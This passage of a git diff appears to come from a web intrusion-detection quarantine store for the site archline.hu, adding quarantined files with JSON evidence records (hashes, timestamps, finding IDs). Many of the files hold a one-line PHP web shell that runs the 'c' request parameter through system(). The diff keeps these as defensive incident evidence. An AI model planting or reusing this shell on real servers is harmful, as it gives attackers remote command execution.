(dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/media/rce_6s2a35.php.json)", + "original_sha256": "eff6ad6424feaa82e756ab3264e8689f6293d56dd50f97e585c9572e2ae4cfaf", + "original_stat": { + "gid": 30037, + "mtime": 1783812899, + "size": 117, + "uid": 20043 + }, + "rel_path": "media/rce_6s2a35.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/media/rce_rk7m5u.php.json b/var/www/hosting/archline.hu/www/media/rce_rk7m5u.php.json new file mode 100644 index 0000000..24c02b8 --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/rce_rk7m5u.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/media/rce_rk7m5u.php.json.evidence.json b/var/www/hosting/archline.hu/www/media/rce_rk7m5u.php.json.evidence.json new file mode 100644 index 0000000..d7b12dc --- /dev/null +++ b/var/www/hosting/archline.hu/www/media/rce_rk7m5u.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3047", + "log_excerpt": "[quarantine] www.archline.hu:media/rce_rk7m5u.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/media/rce_rk7m5u.php.json)", + "original_sha256": "9ba4b855f3bf60b7e6bf5678beca5959f76b278e4fbd911434d08c5ba0f17926", + "original_stat": { + "gid": 30037, + "mtime": 1783812992, + "size": 117, + "uid": 20043 + }, + "rel_path": "media/rce_rk7m5u.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/modules/r0ps_3tdj3r.json b/var/www/hosting/archline.hu/www/modules/r0ps_3tdj3r.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/modules/r0ps_3tdj3r.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/modules/r0ps_3tdj3r.json.evidence.json b/var/www/hosting/archline.hu/www/modules/r0ps_3tdj3r.json.evidence.json new file mode 100644 index 0000000..cc3c227 --- /dev/null +++ b/var/www/hosting/archline.hu/www/modules/r0ps_3tdj3r.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4744", + "log_excerpt": "[quarantine] www.archline.hu:modules/r0ps_3tdj3r.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/modules/r0ps_3tdj3r.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111939, + "size": 74, + "uid": 20043 + }, + "rel_path": "modules/r0ps_3tdj3r.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/modules/r0ps_3tdj3r.php.json b/var/www/hosting/archline.hu/www/modules/r0ps_3tdj3r.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/modules/r0ps_3tdj3r.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/modules/r0ps_3tdj3r.php.json.evidence.json b/var/www/hosting/archline.hu/www/modules/r0ps_3tdj3r.php.json.evidence.json new file mode 100644 index 0000000..1c01a41 --- /dev/null +++ b/var/www/hosting/archline.hu/www/modules/r0ps_3tdj3r.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4745", + "log_excerpt": "[quarantine] www.archline.hu:modules/r0ps_3tdj3r.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/modules/r0ps_3tdj3r.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111920, + "size": 74, + "uid": 20043 + }, + "rel_path": "modules/r0ps_3tdj3r.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/modules/r0ps_bijdps.json b/var/www/hosting/archline.hu/www/modules/r0ps_bijdps.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/modules/r0ps_bijdps.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/modules/r0ps_bijdps.json.evidence.json b/var/www/hosting/archline.hu/www/modules/r0ps_bijdps.json.evidence.json new file mode 100644 index 0000000..71aa985 --- /dev/null +++ b/var/www/hosting/archline.hu/www/modules/r0ps_bijdps.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4737", + "log_excerpt": "[quarantine] www.archline.hu:modules/r0ps_bijdps.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/modules/r0ps_bijdps.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111775, + "size": 74, + "uid": 20043 + }, + "rel_path": "modules/r0ps_bijdps.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/modules/r0ps_bijdps.php.json b/var/www/hosting/archline.hu/www/modules/r0ps_bijdps.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/modules/r0ps_bijdps.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/modules/r0ps_bijdps.php.json.evidence.json b/var/www/hosting/archline.hu/www/modules/r0ps_bijdps.php.json.evidence.json new file mode 100644 index 0000000..5292332 --- /dev/null +++ b/var/www/hosting/archline.hu/www/modules/r0ps_bijdps.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4742", + "log_excerpt": "[quarantine] www.archline.hu:modules/r0ps_bijdps.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/modules/r0ps_bijdps.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111756, + "size": 74, + "uid": 20043 + }, + "rel_path": "modules/r0ps_bijdps.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/modules/r0ps_qbi8yu.json b/var/www/hosting/archline.hu/www/modules/r0ps_qbi8yu.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/modules/r0ps_qbi8yu.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/modules/r0ps_qbi8yu.json.evidence.json b/var/www/hosting/archline.hu/www/modules/r0ps_qbi8yu.json.evidence.json new file mode 100644 index 0000000..7c602a8 --- /dev/null +++ b/var/www/hosting/archline.hu/www/modules/r0ps_qbi8yu.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4746", + "log_excerpt": "[quarantine] www.archline.hu:modules/r0ps_qbi8yu.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/modules/r0ps_qbi8yu.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111793, + "size": 74, + "uid": 20043 + }, + "rel_path": "modules/r0ps_qbi8yu.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/modules/r0ps_qbi8yu.php.json b/var/www/hosting/archline.hu/www/modules/r0ps_qbi8yu.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/modules/r0ps_qbi8yu.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/modules/r0ps_qbi8yu.php.json.evidence.json b/var/www/hosting/archline.hu/www/modules/r0ps_qbi8yu.php.json.evidence.json new file mode 100644 index 0000000..9f17b26 --- /dev/null +++ b/var/www/hosting/archline.hu/www/modules/r0ps_qbi8yu.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4739", + "log_excerpt": "[quarantine] www.archline.hu:modules/r0ps_qbi8yu.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/modules/r0ps_qbi8yu.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111775, + "size": 74, + "uid": 20043 + }, + "rel_path": "modules/r0ps_qbi8yu.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/modules/rce_rsnikm.php.json b/var/www/hosting/archline.hu/www/modules/rce_rsnikm.php.json new file mode 100644 index 0000000..c1854f3 --- /dev/null +++ b/var/www/hosting/archline.hu/www/modules/rce_rsnikm.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/modules/rce_rsnikm.php.json.evidence.json b/var/www/hosting/archline.hu/www/modules/rce_rsnikm.php.json.evidence.json new file mode 100644 index 0000000..a7447ae --- /dev/null +++ b/var/www/hosting/archline.hu/www/modules/rce_rsnikm.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4741", + "log_excerpt": "[quarantine] www.archline.hu:modules/rce_rsnikm.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/modules/rce_rsnikm.php.json)", + "original_sha256": "eff6ad6424feaa82e756ab3264e8689f6293d56dd50f97e585c9572e2ae4cfaf", + "original_stat": { + "gid": 30037, + "mtime": 1783812928, + "size": 117, + "uid": 20043 + }, + "rel_path": "modules/rce_rsnikm.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/modules/rce_xgi4j6.php.json b/var/www/hosting/archline.hu/www/modules/rce_xgi4j6.php.json new file mode 100644 index 0000000..24c02b8 --- /dev/null +++ b/var/www/hosting/archline.hu/www/modules/rce_xgi4j6.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/modules/rce_xgi4j6.php.json.evidence.json b/var/www/hosting/archline.hu/www/modules/rce_xgi4j6.php.json.evidence.json new file mode 100644 index 0000000..7b7dfda --- /dev/null +++ b/var/www/hosting/archline.hu/www/modules/rce_xgi4j6.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4740", + "log_excerpt": "[quarantine] www.archline.hu:modules/rce_xgi4j6.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/modules/rce_xgi4j6.php.json)", + "original_sha256": "9ba4b855f3bf60b7e6bf5678beca5959f76b278e4fbd911434d08c5ba0f17926", + "original_stat": { + "gid": 30037, + "mtime": 1783813019, + "size": 117, + "uid": 20043 + }, + "rel_path": "modules/rce_xgi4j6.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/plugins/r0ps_3tdj3r.json b/var/www/hosting/archline.hu/www/plugins/r0ps_3tdj3r.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/plugins/r0ps_3tdj3r.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/plugins/r0ps_3tdj3r.json.evidence.json b/var/www/hosting/archline.hu/www/plugins/r0ps_3tdj3r.json.evidence.json new file mode 100644 index 0000000..6dd95d8 --- /dev/null +++ b/var/www/hosting/archline.hu/www/plugins/r0ps_3tdj3r.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4711", + "log_excerpt": "[quarantine] www.archline.hu:plugins/r0ps_3tdj3r.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/plugins/r0ps_3tdj3r.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111935, + "size": 74, + "uid": 20043 + }, + "rel_path": "plugins/r0ps_3tdj3r.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/plugins/r0ps_3tdj3r.php.json b/var/www/hosting/archline.hu/www/plugins/r0ps_3tdj3r.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/plugins/r0ps_3tdj3r.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/plugins/r0ps_3tdj3r.php.json.evidence.json b/var/www/hosting/archline.hu/www/plugins/r0ps_3tdj3r.php.json.evidence.json new file mode 100644 index 0000000..45ca5e6 --- /dev/null +++ b/var/www/hosting/archline.hu/www/plugins/r0ps_3tdj3r.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4712", + "log_excerpt": "[quarantine] www.archline.hu:plugins/r0ps_3tdj3r.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/plugins/r0ps_3tdj3r.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111918, + "size": 74, + "uid": 20043 + }, + "rel_path": "plugins/r0ps_3tdj3r.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/plugins/r0ps_bijdps.json b/var/www/hosting/archline.hu/www/plugins/r0ps_bijdps.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/plugins/r0ps_bijdps.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/plugins/r0ps_bijdps.json.evidence.json b/var/www/hosting/archline.hu/www/plugins/r0ps_bijdps.json.evidence.json new file mode 100644 index 0000000..209365a --- /dev/null +++ b/var/www/hosting/archline.hu/www/plugins/r0ps_bijdps.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4708", + "log_excerpt": "[quarantine] www.archline.hu:plugins/r0ps_bijdps.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/plugins/r0ps_bijdps.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111772, + "size": 74, + "uid": 20043 + }, + "rel_path": "plugins/r0ps_bijdps.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/plugins/r0ps_bijdps.php.json b/var/www/hosting/archline.hu/www/plugins/r0ps_bijdps.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/plugins/r0ps_bijdps.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/plugins/r0ps_bijdps.php.json.evidence.json b/var/www/hosting/archline.hu/www/plugins/r0ps_bijdps.php.json.evidence.json new file mode 100644 index 0000000..ea6384c --- /dev/null +++ b/var/www/hosting/archline.hu/www/plugins/r0ps_bijdps.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4710", + "log_excerpt": "[quarantine] www.archline.hu:plugins/r0ps_bijdps.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/plugins/r0ps_bijdps.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111754, + "size": 74, + "uid": 20043 + }, + "rel_path": "plugins/r0ps_bijdps.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/plugins/r0ps_qbi8yu.json b/var/www/hosting/archline.hu/www/plugins/r0ps_qbi8yu.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/plugins/r0ps_qbi8yu.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/plugins/r0ps_qbi8yu.json.evidence.json b/var/www/hosting/archline.hu/www/plugins/r0ps_qbi8yu.json.evidence.json new file mode 100644 index 0000000..8303854 --- /dev/null +++ b/var/www/hosting/archline.hu/www/plugins/r0ps_qbi8yu.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4713", + "log_excerpt": "[quarantine] www.archline.hu:plugins/r0ps_qbi8yu.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/plugins/r0ps_qbi8yu.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111790, + "size": 74, + "uid": 20043 + }, + "rel_path": "plugins/r0ps_qbi8yu.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/plugins/r0ps_qbi8yu.php.json b/var/www/hosting/archline.hu/www/plugins/r0ps_qbi8yu.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/plugins/r0ps_qbi8yu.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/plugins/r0ps_qbi8yu.php.json.evidence.json b/var/www/hosting/archline.hu/www/plugins/r0ps_qbi8yu.php.json.evidence.json new file mode 100644 index 0000000..b0c8817 --- /dev/null +++ b/var/www/hosting/archline.hu/www/plugins/r0ps_qbi8yu.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4709", + "log_excerpt": "[quarantine] www.archline.hu:plugins/r0ps_qbi8yu.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/plugins/r0ps_qbi8yu.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111773, + "size": 74, + "uid": 20043 + }, + "rel_path": "plugins/r0ps_qbi8yu.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/plugins/system/helix3/rce_a2vffk.php.json b/var/www/hosting/archline.hu/www/plugins/system/helix3/rce_a2vffk.php.json new file mode 100644 index 0000000..c1854f3 --- /dev/null +++ b/var/www/hosting/archline.hu/www/plugins/system/helix3/rce_a2vffk.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/plugins/system/helix3/rce_a2vffk.php.json.evidence.json b/var/www/hosting/archline.hu/www/plugins/system/helix3/rce_a2vffk.php.json.evidence.json new file mode 100644 index 0000000..51b6dd0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/plugins/system/helix3/rce_a2vffk.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4725", + "log_excerpt": "[quarantine] www.archline.hu:plugins/system/helix3/rce_a2vffk.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/plugins/system/helix3/rce_a2vffk.php.json)", + "original_sha256": "eff6ad6424feaa82e756ab3264e8689f6293d56dd50f97e585c9572e2ae4cfaf", + "original_stat": { + "gid": 30037, + "mtime": 1783812863, + "size": 117, + "uid": 20043 + }, + "rel_path": "plugins/system/helix3/rce_a2vffk.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/plugins/system/helix3/rce_qrglh1.php.json b/var/www/hosting/archline.hu/www/plugins/system/helix3/rce_qrglh1.php.json new file mode 100644 index 0000000..24c02b8 --- /dev/null +++ b/var/www/hosting/archline.hu/www/plugins/system/helix3/rce_qrglh1.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/plugins/system/helix3/rce_qrglh1.php.json.evidence.json b/var/www/hosting/archline.hu/www/plugins/system/helix3/rce_qrglh1.php.json.evidence.json new file mode 100644 index 0000000..b37e709 --- /dev/null +++ b/var/www/hosting/archline.hu/www/plugins/system/helix3/rce_qrglh1.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4724", + "log_excerpt": "[quarantine] www.archline.hu:plugins/system/helix3/rce_qrglh1.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/plugins/system/helix3/rce_qrglh1.php.json)", + "original_sha256": "9ba4b855f3bf60b7e6bf5678beca5959f76b278e4fbd911434d08c5ba0f17926", + "original_stat": { + "gid": 30037, + "mtime": 1783812960, + "size": 117, + "uid": 20043 + }, + "rel_path": "plugins/system/helix3/rce_qrglh1.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/r0ps_3tdj3r.json b/var/www/hosting/archline.hu/www/r0ps_3tdj3r.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/r0ps_3tdj3r.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/r0ps_3tdj3r.json.evidence.json b/var/www/hosting/archline.hu/www/r0ps_3tdj3r.json.evidence.json new file mode 100644 index 0000000..1fa6417 --- /dev/null +++ b/var/www/hosting/archline.hu/www/r0ps_3tdj3r.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2902", + "log_excerpt": "[quarantine] www.archline.hu:r0ps_3tdj3r.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/r0ps_3tdj3r.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 0, + "mtime": 1784111943, + "size": 74, + "uid": 20043 + }, + "rel_path": "r0ps_3tdj3r.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/r0ps_3tdj3r.php.json b/var/www/hosting/archline.hu/www/r0ps_3tdj3r.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/r0ps_3tdj3r.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/r0ps_3tdj3r.php.json.evidence.json b/var/www/hosting/archline.hu/www/r0ps_3tdj3r.php.json.evidence.json new file mode 100644 index 0000000..c4f347f --- /dev/null +++ b/var/www/hosting/archline.hu/www/r0ps_3tdj3r.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2908", + "log_excerpt": "[quarantine] www.archline.hu:r0ps_3tdj3r.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/r0ps_3tdj3r.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 0, + "mtime": 1784111924, + "size": 74, + "uid": 20043 + }, + "rel_path": "r0ps_3tdj3r.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/r0ps_bijdps.json b/var/www/hosting/archline.hu/www/r0ps_bijdps.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/r0ps_bijdps.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/r0ps_bijdps.json.evidence.json b/var/www/hosting/archline.hu/www/r0ps_bijdps.json.evidence.json new file mode 100644 index 0000000..4acf759 --- /dev/null +++ b/var/www/hosting/archline.hu/www/r0ps_bijdps.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2839", + "log_excerpt": "[quarantine] www.archline.hu:r0ps_bijdps.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/r0ps_bijdps.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 0, + "mtime": 1784111780, + "size": 74, + "uid": 20043 + }, + "rel_path": "r0ps_bijdps.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/r0ps_bijdps.php.json b/var/www/hosting/archline.hu/www/r0ps_bijdps.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/r0ps_bijdps.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/r0ps_bijdps.php.json.evidence.json b/var/www/hosting/archline.hu/www/r0ps_bijdps.php.json.evidence.json new file mode 100644 index 0000000..025a5b6 --- /dev/null +++ b/var/www/hosting/archline.hu/www/r0ps_bijdps.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2893", + "log_excerpt": "[quarantine] www.archline.hu:r0ps_bijdps.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/r0ps_bijdps.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 0, + "mtime": 1784111760, + "size": 74, + "uid": 20043 + }, + "rel_path": "r0ps_bijdps.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/r0ps_qbi8yu.json b/var/www/hosting/archline.hu/www/r0ps_qbi8yu.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/r0ps_qbi8yu.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/r0ps_qbi8yu.json.evidence.json b/var/www/hosting/archline.hu/www/r0ps_qbi8yu.json.evidence.json new file mode 100644 index 0000000..0b931b5 --- /dev/null +++ b/var/www/hosting/archline.hu/www/r0ps_qbi8yu.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2928", + "log_excerpt": "[quarantine] www.archline.hu:r0ps_qbi8yu.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/r0ps_qbi8yu.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 0, + "mtime": 1784111798, + "size": 74, + "uid": 20043 + }, + "rel_path": "r0ps_qbi8yu.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/r0ps_qbi8yu.php.json b/var/www/hosting/archline.hu/www/r0ps_qbi8yu.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/r0ps_qbi8yu.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/r0ps_qbi8yu.php.json.evidence.json b/var/www/hosting/archline.hu/www/r0ps_qbi8yu.php.json.evidence.json new file mode 100644 index 0000000..451b40d --- /dev/null +++ b/var/www/hosting/archline.hu/www/r0ps_qbi8yu.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2882", + "log_excerpt": "[quarantine] www.archline.hu:r0ps_qbi8yu.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/r0ps_qbi8yu.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 0, + "mtime": 1784111779, + "size": 74, + "uid": 20043 + }, + "rel_path": "r0ps_qbi8yu.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git 